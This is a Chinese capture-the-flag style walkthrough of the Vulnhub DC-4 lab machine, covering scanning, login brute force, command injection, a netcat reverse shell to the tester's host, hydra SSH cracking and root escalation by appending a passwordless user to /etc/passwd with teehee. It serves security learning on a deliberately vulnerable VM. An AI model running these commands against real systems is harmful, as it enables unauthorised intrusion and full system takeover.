看完这篇 教你玩转渗透测试靶机vulnhub——DC4

Vulnhub靶机DC4渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:暴力破解:
        • ③:提权:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:http://www.five86.com/downloads/DC-4.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第1张图片
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第2张图片

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第3张图片
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.30

使用命令:nmap -sS -sV -A -n 172.16.5.30

看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第4张图片
开启了80和22端口,我们直接访问80端口 dirb 扫了一下没啥 可能就是暴力破解!!
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第5张图片

②:暴力破解:

使用一个工具burp设置代理 然后抓个包 输入账号admin密码123456 发送到Intruder模块 设置一个字典 然后 线程设置2000 start attack
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第6张图片
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第7张图片
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第8张图片
这里我们知道知道了密码:happy 成功登入!!
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第9张图片

这里应该是个命令执行漏洞,pyload:radio=cat+/etc/passwd&submit=Run 查看用户,发现有三个普通用户:charles、jim、sam
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第10张图片

nc -e /bin/bash/ 172.16.5.42 4444

看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第11张图片
使用nc -lvp 4444命令进行反弹,反弹成功 设置python交互 python3 -c "import pty;pty.spawn('/bin/bash')"
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第12张图片
信息收集一下 uname -a 进入/home/ 进入/jim/cat test.sh
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第13张图片看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第14张图片
在backups 中发现了old-passwords.bak
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第15张图片
把这个old-passwords.bak里面的复制到kali中然后新建一个字典jim.txt

使用命令:hydra -l jim -P /root/桌面/jim.txt ssh://172.16.5.30

看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第16张图片
获得密码为:jibril04 登入ssh
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第17张图片
登入提示:You have mail 让我们看邮寄 cd/var/mail 发现了jim里面有个Charles密码:^xHhA&hvim0y 尝试切换登入

看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第18张图片
提示我们使用teehee提权:sudo teehee --help
看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第19张图片

③:提权:

root权限免密码使用teehee ,teehee 是啥???太菜了不会 ,,,,,,学了半天

大概就是当发现有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]

echo "axb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第20张图片
至此获取到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

这是做的第五个靶场了,学习的知识点和一些细节就是 :
1.需要注意的细节就是bp抓包的时候不要发送到repeater,那个send和Forward不一样 这里卡了很久一直报错,然后没有回弹shell。

看完这篇 教你玩转渗透测试靶机vulnhub——DC4_第21张图片
2.需要注意的还是python交互那个 容易打错,一定要细心在细心,我前面加了个python3就好
3.把这个old-passwords.bak里面的复制到kali这样才方便爆破 好像下载不了只能复制(我比较菜就只能这样做了)
4.还有个小失误就是 jim里面有个charles用户 我ssh登入的时候 写的是大写的登了半天没进去(气死我了,还是要多细心呀!!)
5.想感慨一下,因为是第一次做 每次都会发现新问题然后去解决 对自己也挺好的 收获也挺多的 多去尝试就好啦!加油!!

新知识点:
①:学习了hydra (九头蛇)工具的使用
②学习了teehee 提权
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!

你可能感兴趣的:(渗透测试)